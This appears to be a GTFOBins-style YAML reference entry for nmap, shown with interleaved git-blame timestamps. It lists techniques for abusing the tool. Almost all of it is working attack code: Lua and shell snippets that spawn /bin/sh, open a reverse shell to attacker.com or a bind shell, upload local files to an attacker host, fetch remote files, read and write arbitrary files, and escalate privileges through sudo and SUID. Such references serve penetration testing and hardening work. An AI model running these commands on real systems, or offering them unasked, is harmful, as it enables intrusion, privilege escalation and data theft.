2018-08-17 17:16:09 +02:00
---
functions:
2018-10-05 19:55:38 +02:00
shell:
2018-08-23 17:57:26 +02:00
- description: Input echo is disabled.
2018-08-19 09:52:24 +02:00
code: |
2018-08-19 12:20:37 +02:00
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF
2018-12-24 01:48:13 +01:00
- description: The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.
code: |
nmap --interactive
nmap> !sh
2018-10-05 19:55:38 +02:00
non-interactive-reverse-shell:
2018-08-23 19:29:50 +02:00
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
TF=$(mktemp)
echo 'local s=require("socket");
2019-01-29 14:25:16 +01:00
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
while true do
local r,x=t:receive();local f=assert(io.popen(r,"r"));
local b=assert(f:read("*a"));t:send(b);
end;
f:close();t:close();' > $TF
2018-08-23 19:29:50 +02:00
nmap --script=$TF
2018-10-05 19:55:38 +02:00
non-interactive-bind-shell:
2018-08-23 19:29:50 +02:00
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
export LPORT=12345
TF=$(mktemp)
echo 'local k=require("socket");
2019-01-29 14:25:16 +01:00
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
while true do
local r,x=c:receive();local f=assert(io.popen(r,"r"));
local b=assert(f:read("*a"));c:send(b);
end;c:close();f:close();' > $TF
2018-08-23 19:29:50 +02:00
nmap --script=$TF
2018-10-05 19:55:38 +02:00
file-upload:
2019-07-29 16:41:49 +02:00
- description: Send a local file via TCP. Run `socat -v tcp-listen:8080,reuseaddr,fork - on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP like 80 or 8080.
2019-07-29 16:32:49 +02:00
code: |
RHOST=attacker.com
RPORT=8080
LFILE=file_to_send
nmap -p $RPORT $RHOST --script http-put --script-args http-put.url=/,http-put.file=$LFILE
2019-07-29 16:41:49 +02:00
- description: Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
2018-08-23 19:29:50 +02:00
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
TF=$(mktemp)
echo 'local f=io.open(os.getenv("LFILE"), 'rb')
2019-01-29 14:25:16 +01:00
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();' > $TF
2018-08-23 19:29:50 +02:00
nmap --script=$TF
2018-10-05 19:55:38 +02:00
file-download:
2019-07-29 16:41:49 +02:00
- description: Fetch a remote file via TCP. Run a proper HTTP server on the attacker box to send the file, e.g., `php -S 0.0.0.0:8080` . Note that multiple connections are made to the server and the result is placed in `$TF/IP/PORT/PATH` . Also, it is important that the port is a commonly used HTTP like 80 or 8080.
2019-07-29 16:32:49 +02:00
code: |
RHOST=attacker.com
RPORT=8080
TF=$(mktemp -d)
LFILE=file_to_save
nmap -p $RPORT $RHOST --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=$LFILE
2019-07-29 16:41:49 +02:00
- description: Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
2018-08-23 19:29:50 +02:00
code: |
export LPORT=12345
export LFILE=file_to_save
TF=$(mktemp)
echo 'local k=require("socket");
2019-01-29 14:25:16 +01:00
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);' > $TF
2018-08-23 19:29:50 +02:00
nmap --script=$TF
file-write:
- code: |
TF=$(mktemp)
2021-01-11 11:37:37 +01:00
echo 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
2018-08-23 19:29:50 +02:00
nmap --script=$TF
2021-01-04 08:58:56 +01:00
- description: The payload appears inside the regular nmap output.
code: |
LFILE=file_to_write
nmap -oG=$LFILE DATA
2018-08-23 19:29:50 +02:00
file-read:
- code: |
TF=$(mktemp)
2021-01-11 11:37:37 +01:00
echo 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
2018-08-23 19:29:50 +02:00
nmap --script=$TF
2023-12-23 12:53:39 +01:00
- description: The file is actually parsed as a list of hosts/networks, lines are leaked through error messages.
code: |
nmap -iL file_to_read
2018-10-05 19:55:38 +02:00
sudo:
2018-08-23 17:57:26 +02:00
- description: Input echo is disabled.
2018-08-19 09:52:24 +02:00
code: |
2018-08-19 12:20:37 +02:00
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
2018-12-24 01:48:13 +01:00
- description: The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.
code: |
sudo nmap --interactive
nmap> !sh
2018-10-05 19:55:38 +02:00
limited-suid:
2018-08-23 17:57:26 +02:00
- description: Input echo is disabled.
2018-08-19 09:52:24 +02:00
code: |
2018-08-19 12:20:37 +02:00
TF=$(mktemp)
2018-08-24 00:45:07 +02:00
echo 'os.execute("/bin/sh")' > $TF
2018-08-19 12:20:37 +02:00
./nmap --script=$TF
2021-01-04 08:58:56 +01:00
suid:
- description: The payload appears inside the regular nmap output.
2021-01-04 08:16:29 +01:00
code: |
2021-01-04 08:58:56 +01:00
LFILE=file_to_write
./nmap -oG=$LFILE DATA
2018-08-17 17:16:09 +02:00
---